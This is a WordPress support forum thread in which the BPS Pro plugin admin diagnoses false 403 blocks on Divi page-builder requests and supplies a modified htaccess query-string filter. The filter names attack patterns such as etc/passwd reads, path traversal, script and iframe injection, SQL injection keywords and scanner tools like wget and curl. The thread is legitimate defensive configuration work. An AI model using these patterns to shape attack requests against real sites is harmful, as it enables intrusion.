Divi Theme-Related Security Log Entries

[Living Miracles]

Hello,

On my SiteGround Dedicated server-hosted sites that use the Divi theme (a premium theme made by Elegant Themes), I recently noticed security log entries after updating the Divi theme and opening a page in the backend that uses the page builder that comes with the theme.

Here is an example of the log entries we’re seeing:

[403 POST Request: January 17, 2020 - 9:28 am]
BPS Pro: 14.3
WP: 5.3.2
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: 216.250.39.154
Host Name: d216-250-39-154.allwest.net
SERVER_PROTOCOL: HTTP/1.0
HTTP_CLIENT_IP: 
HTTP_FORWARDED: 
HTTP_X_FORWARDED_FOR: 
HTTP_X_CLUSTER_CLIENT_IP: 
REQUEST_METHOD: POST
HTTP_REFERER: https://domain.tld/?et_pb_preview=true&et_pb_preview_nonce=0e64d00e88&iframe_id=et-fb-preview-1579278494104-765
REQUEST_URI: /?et_pb_preview=true&et_pb_preview_nonce=0e64d00e88&iframe_id=et-fb-preview-1579278494104-765
QUERY_STRING: et_pb_preview=true&et_pb_preview_nonce=0e64d00e88&iframe_id=et-fb-preview-1579278494104-765
HTTP_USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
REQUEST BODY: et_pb_preview_nonce=0e64d00e88&is_fb_preview=true&shortcode=%5Bet_pb_section+fb_built%3D%221%22+admin_label%3D%22section%22+_builder_version%3D%223.22%22%5D%5Bet_pb_row+admin_label%3D%22row%22+_builder_version%3D%223.25%22+background_size%3D%22initial%22+background_position%3D%22top_left%22+background_repeat%3D%22repeat%22%5D%5Bet_pb_column+type%3D%224_4%22+_builder_version%3D%223.25%22+custom_padding%3D%22%7C%7C%7C%22+custom_padding__hover%3D%22%7C%7C%7C%22%5D%5Bet_pb_post_title+meta%3D%22off%2

Here is what I can see: The “et_” is definitely from the Divi theme or builder (“et” stands for Elegant Themes). It seems that this should be a normal theme-related process that shouldn’t be getting flagged by BPS Pro, yet for some reason it is getting flagged as “BFHS – Blocked/Forbidden Hacker or Spammer.” Can you see what is in this log entry that’s getting flagged by BPS Pro?

Ideally, I wouldn’t want to get these security log entries each time I open a page in the backend to edit. Are you able to tell if this issue is on BPS Pro’s or Elegant Themes’ end? If it is on Elegant Themes’ end, could you suggest something I should pass along to them so that they can resolve the issue?

FYI, even though we are seeing those security log entries, it does appear that the builder functions properly.

Thank you!
Nicolas from Living Miracles

[AITpro Admin]

See this forum topic for the solution > https://forum.ait-pro.com/forums/topic/whitelist-monarch-plugin/#post-37359

[Living Miracles]

Okay, thank you for the response. We’ll try this out across our sites when we have the time and see if this resolves the issue.

Nicolas from Living Miracles

[Living Miracles]

Hello,

We randomly ran into another Divi theme-related 403 error today on one of ours sites. All we did was try to export a page through the Divi builder. So far getting this 403 error isn’t consistently happening across all the pages, instead, it is only on one or two pages but the reason isn’t obvious yet. The following GET request block is what we’re seeing in the Security Log entry:

[403 GET Request: June 20, 2021 - 1:31 pm]
BPS Pro: 15.3
WP: 5.7.2
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: Our.IP.Address
Host Name: Our.ISP.Host.Name
SERVER_PROTOCOL: HTTP/1.0
HTTP_CLIENT_IP: 
HTTP_FORWARDED: 
HTTP_X_FORWARDED_FOR: Our.IP.Address
HTTP_X_CLUSTER_CLIENT_IP: 
REQUEST_METHOD: GET
HTTP_REFERER: https://domain.tld/what-is-a-mystery-school/?et_fb=1&et_bfb=1&PageSpeed=off
REQUEST_URI: /wp-admin/?et_core_portability=1&context=et_builder&name=temp_name&nonce=288bee4b55&timestamp=1624195876&name=What%20Is%20a%20Mystery%20School?
QUERY_STRING: et_core_portability=1&context=et_builder&name=temp_name&nonce=288bee4b55&timestamp=1624195876&name=What%20Is%20a%20Mystery%20School?
HTTP_USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36

Do you have any idea why this is happening only on one or two pages? I’ve never seen this particular issue before and we have many sites that use Divi. If I actually need to manually whitelist something here, can you tell me where in BPS Pro and how I would do this?

Thank you.

[AITpro Admin]

The 403 error is being caused by this security rule in the wp-admin htaccess file (not your Root htaccess file):  RewriteCond %{THE_REQUEST} (\?|\*|%2a)+(%20+|\\s+|%20+\\s+|\\s+%20+|\\s+%20+\\s+)(http|https)(:/|/) [NC,OR]. %20 is the url encoded blank space. Note: The + sign is typically used these days instead of %20 for url encoding a blank space. To fix this problem do the steps below.

1. Copy the modified wp-admin htaccess code below and paste it into this wp-admin Custom Code text box (not a Root Custom Code text box): 4. CUSTOM CODE BPSQSE-check BPS QUERY STRING EXPLOITS AND FILTERS.
2. Click the Save wp-admin Custom Code button.
3. Go to the BPS Pro > Setup menu > Setup Wizard page and run the Pre-installation Wizard and Setup Wizard.

# BEGIN BPSQSE-check BPS QUERY STRING EXPLOITS AND FILTERS
# WORDPRESS WILL BREAK IF ALL THE BPSQSE FILTERS ARE DELETED
# Use BPS wp-admin Custom Code to modify/edit/change this code and to save it permanently.
RewriteCond %{HTTP_USER_AGENT} (%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (;|<|>|'|"|\)|\(|%0A|%0D|%22|%27|%28|%3C|%3E|%00).*(libwww-perl|wget|python|nikto|curl|scan|java|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner) [NC,OR]
RewriteCond %{THE_REQUEST} (\*|%2a)+(%20+|\s+|%20+\s+|\s+%20+|\s+%20+\s+)(http|https)(:/|/) [NC,OR]
RewriteCond %{THE_REQUEST} etc/passwd [NC,OR]
RewriteCond %{THE_REQUEST} cgi-bin [NC,OR]
RewriteCond %{THE_REQUEST} (%0A|%0D) [NC,OR]
RewriteCond %{REQUEST_URI} owssvr\.dll [NC,OR]
RewriteCond %{HTTP_REFERER} (%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
RewriteCond %{HTTP_REFERER} \.opendirviewer\. [NC,OR]
RewriteCond %{HTTP_REFERER} users\.skynet\.be.* [NC,OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(http|https):// [NC,OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [NC,OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR]
RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR]
RewriteCond %{QUERY_STRING} (\.\./|%2e%2e%2f|%2e%2e/|\.\.%2f|%2e\.%2f|%2e\./|\.%2e%2f|\.%2e/) [NC,OR]
RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
RewriteCond %{QUERY_STRING} (http|https)\: [NC,OR]
RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)cPath=(http|https)://(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} ^.*(\(|\)|<|>).* [NC,OR]
RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR]
RewriteCond %{QUERY_STRING} (\.{1,}/)+(motd|etc|bin) [NC,OR]
RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]
RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]
RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|convert|alter|declare|order|script|set|md5|benchmark|encode) [NC,OR]
RewriteCond %{QUERY_STRING} (sp_executesql) [NC]
RewriteRule ^(.*)$ - [F]
# END BPSQSE-check BPS QUERY STRING EXPLOITS AND FILTERS

[Living Miracles]

Thanks for your quick reply, this fixed the issue!

Do you have any thoughts as to why this issue was only occurring on a couple of pages on this site at this point instead of affecting all of them? I just noticed that the two pages that are having this issue contain a ? question mark in the back-end page title whereas none of the other pages that the export worked for have this. Could this be the culprit? I notice that the security rule you pointed out doesn’t contain \?| after the opening parenthesis of that rule in the modified version.

Is this slightly modified wp-admin htaccess code something you think we’ll need to or would be worth adding to all of our sites, or at least all of our Divi-themed sites? Or do you think we should just wait to see if we eventually experience this issue on any of our other sites before adding it?

[AITpro Admin]

The problem is/was that this Query String: What%20Is%20a%20Mystery%20School that matches that particular security rule that blocks several blank spaces in a Query String. The modification I made to that particular security rule now allows several blanks spaces in Query Strings, which is safe/fine to do. Blocking the Asterisk character is the only important part of that security rule. It’s up to you if you want to add that security rule modification on your other sites or not.

[Living Miracles]

I see. Okay, thank you for the information. I believe that’s all for this issue now then. 🙏🏼

[Author]

Posts